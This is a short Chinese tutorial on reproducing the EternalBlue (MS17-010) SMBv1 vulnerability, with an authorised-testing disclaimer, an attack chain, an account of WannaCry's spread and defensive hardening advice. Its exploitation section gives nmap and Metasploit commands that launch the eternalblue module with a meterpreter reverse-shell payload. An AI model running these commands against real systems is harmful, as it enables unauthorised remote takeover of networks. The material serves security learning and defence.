永恒之蓝(MS17-010)完整复现:SMBv1 远程代码执行、利用步骤、传播机制、防御加固。
写在前面:合法学习边界
永恒之蓝攻击只在授权测试环境进行。对非授权目标利用 MS17-010 可能触犯法律。
一、永恒之蓝攻击链

1
| ① 扫描 SMB 端口 → ② 发送恶意 SMB 包 → ③ 内存破坏 → ④ 执行 Shellcode → ⑤ 横向传播
|
二、利用步骤
1
2
3
4
5
6
7
8
| # nmap 扫描
nmap -p445 --script=smb-vuln-ms17-010 target
# metasploit 利用
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
|
三、传播机制
1
2
| WannaCry 勒索病毒利用永恒之蓝传播
自动扫描内网 SMB 端口 → 自动利用 → 自动加密文件 → 索要比特币
|
四、防御加固
1
2
3
| 关闭 SMBv1 · 打 MS17-010 补丁
防火墙关闭 445 端口
监控异常 SMB 连接
|
五、小结
永恒之蓝是 SMBv1 的远程代码执行漏洞,可导致整个内网沦陷。防御核心是关闭 SMBv1 + 打补丁。